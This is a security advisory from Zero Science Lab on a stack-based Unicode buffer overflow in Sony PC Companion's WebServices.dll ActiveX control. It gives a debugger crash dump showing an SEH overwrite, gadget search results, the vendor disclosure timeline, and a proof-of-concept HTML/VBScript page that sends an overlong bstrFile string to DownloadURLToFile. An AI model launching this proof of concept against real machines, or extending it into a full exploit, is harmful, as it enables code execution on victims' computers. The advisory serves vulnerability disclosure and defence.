Sony PC Companion 2.1 WebServices.dll Unicode Buffer Overflow

`  
Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overload SEH  
  
  
Vendor: Sony Mobile Communications AB  
Product web page: http://www.sonymobile.com  
Affected version: 2.10.115 (Production 27.1, Build 830)  
2.10.108 (Production 26.1, Build 818)  
  
Summary: PC Companion is a computer application that acts as a portal  
to Sony Xperia and operator features and applications, such as phone  
software updates, management of contacts and calendar, media management  
with Media Go, and a backup and restore feature for your phone content.  
  
Desc: The vulnerability is caused due to a boundary error in WebServices.dll  
when handling the value assigned to the 'bstrFile' item in the DownloadURLToFile  
function and can be exploited to cause a stack-based buffer overflow via an  
overly long string which may lead to execution of arbitrary code on the  
affected machine.  
  
  
------------------------------------------------------------------------------  
  
STATUS_STACK_BUFFER_OVERRUN encountered  
(1120.16cc): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=001f0000 ecx=00000044 edx=001ee5d4 esi=00000000 edi=00000000  
eip=00000000 esp=001ee558 ebp=001ee5d8 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
00000000 ?? ???  
0:000> !exchain  
001eef24: 00430043  
Invalid exception stack at 00420042  
0:000> d 001eef24  
001eef24 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.  
001eef34 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef44 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef54 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef64 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef74 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef84 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
001eef94 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0:000>  
  
------------------------------------------------------------------------------  
  
Found pop esi - pop ebp - ret 08 at 0x00040030 [wscript.exe]  
** Unicode compatible **  
** Null byte **  
{PAGE_EXECUTE_READ}  
[SafeSEH: Yes - ASLR : Yes]  
[Fixup: Yes] - C:\Windows\System32\wscript.exe  
  
--  
  
Found pop esi - pop ebp - ret 0c at 0x0004007E [wscript.exe]  
** Unicode compatible **  
** Null byte **  
{PAGE_EXECUTE_READ}  
[SafeSEH: Yes - ASLR : Yes]  
[Fixup: Yes] - C:\Windows\System32\wscript.exe  
  
------------------------------------------------------------------------------  
  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Vendor status:  
  
[09.11.2012] Vulnerability discovered in version 2.10.108 (Production 26.1, Build 818).  
[15.11.2012] Contact with the vendor.  
[16.11.2012] Vendor responds asking more details.  
[18.11.2012] Sent detailed information to the vendor.  
[21.11.2012] Asked vendor for status update.  
[21.11.2012] Vendor is investigating the issue.  
[30.11.2012] Vendor confirms the vulnerability.  
[30.11.2012] Working with the vendor.  
[03.12.2012] Version 2.10.115 (Production 27.1, Build 830) is released, still vulnerable.  
[05.12.2012] Asked vendor for status update.  
[06.12.2012] Vendor investigates, promising to share an update soon.  
[12.12.2012] Asked vendor for scheduled patch release date.  
[17.12.2012] No reply from vendor.  
[18.12.2012] Asked vendor for status update.  
[19.12.2012] No reply from vendor.  
[19.12.2012] Notified the vendor that the advisory will be published on 20th of December.  
[20.12.2012] Vendor promises patch in the first quarter of 2013.  
[20.12.2012] Public security advisory released.  
  
  
Advisory ID: ZSL-2012-5117  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5117.php  
  
http://cwe.mitre.org/data/definitions/121.html  
  
  
09.11.2012  
  
---  
  
  
<html>  
<body>  
<object classid='clsid:0F987E61-9C94-49FA-9B6D-2F99BDEB6CF6' id='overrun' />  
<script language='vbscript'>  
targetFile = "C:\Program Files\Sony\Sony PC Companion\WebServices.dll"  
prototype = "Sub DownloadURLToFile ( ByVal bstrUrl As String , ByVal bstrFile As String )"  
memberName = "DownloadURLToFile"  
progid = "WebServicesLib.HttpClient"  
argCount = 2  
  
bstrUrl="defaultV"  
bstrFile=String(758, "A") + "BB" + "CC" + String(4238, "D")  
  
' ^ ^ ^ ^  
' | | | |  
'----------- junk --------- nseh - seh ------- junk --------  
  
overrun.DownloadURLToFile bstrUrl, bstrFile  
  
</script>  
</body>  
</html>  
`